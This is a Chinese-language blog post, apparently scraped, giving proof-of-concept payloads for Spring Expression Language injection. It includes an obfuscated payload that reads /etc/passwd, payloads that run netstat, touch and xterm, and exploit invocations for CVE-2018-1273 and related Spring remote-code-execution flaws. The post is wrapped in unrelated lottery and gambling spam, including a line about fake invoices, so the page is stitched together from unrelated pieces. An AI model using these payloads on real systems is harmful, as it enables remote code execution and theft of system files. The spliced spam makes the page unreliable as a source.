双色球彩民乐预测 今晚双色球预测最准确号码预测 双色球开奖玩法说明 双色球中奖图片恶搞 双色球精准预测6十1玉玲珑 微信可以购买双色球吗 双色球走势图表近50期 双色球中奖方法 双色球开奖结果走势图全图 双色球连号组数怎么看 双色球开奖查询表 双色球选号技巧 双色球专家杀号360 双色球预测最准确专家 程远双色球预测分析

Spring SPEL注入漏洞利用

0c0c0f 2018-06-16 16:38:47

SPEL注入POC:

命令回顯poc:

T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())

${@[email protected](@[email protected]().exec(%27netstat%20-na%27).getInputStream())}

..

命令執行poc:

#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"touch/tmp/foobar\")}

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

..

近期pivotal官方的漏洞利用,如下:

漏洞編號: 

cve-2018-1273

漏洞環境:

/Users/***/soft/vulapp/spring-data-examples/web/projection/target

漏洞利用:

package com.evil.exp   SpringDataCommonsRCE
args -u http://127.0.0.1:8080/ -cmd ls

漏洞來源:https://pivotal.io/security/cve-2018-1273

漏洞編號:cve-2018-1273

漏洞環境:

/Users/***/javaweb/spring-boot-2.0.0.M2/spring-boot-samples/spring-boot-sample-data-rest/target

漏洞利用:

package com.evil.exp   SpringDataRestRCE
args -u lshttp://127.0.0.1:8080/api/cities/1-cmd ls

漏洞編號:cve-2018-1273

漏洞環境:

/Users/***/javaweb/gs-messaging-stomp-websocket/complete/target

漏洞利用:

package com.evil.exp  SpringMessagingRCE
ws://127.0.0.1:8080/hello /topic/greetings /Applications/Calculator.ap

參考: 
https://github.com/genxor/CVE-2018-1270_EXP
https://www.exploit-db.com/exploits/44289/



双色球吧贴
双色球彩民乐预测 今晚双色球预测最准确号码预测 双色球开奖玩法说明 双色球中奖图片恶搞 双色球精准预测6十1玉玲珑 微信可以购买双色球吗 双色球走势图表近50期 双色球中奖方法 双色球开奖结果走势图全图 双色球连号组数怎么看 双色球开奖查询表 双色球选号技巧 双色球专家杀号360 双色球预测最准确专家 程远双色球预测分析
喜乐彩票网址 梦幻西游手游老区百级号怎么赚钱 领导给员工赚钱的机会 大庆欣凤学城售楼员赚钱吗 关于分享经济模式赚钱的论文 北方麻将的玩法和规则 金牛棋牌官方下载 大乐透中奖规则表说明 拍抖音短视频是不是可以赚钱 h5棋牌赚钱 鑫彩网彩票首页 pk10如何判断出长龙 淘宝种草文赚钱 华阳彩票游戏 麻将老虎机安卓 做假发票生意赚钱吗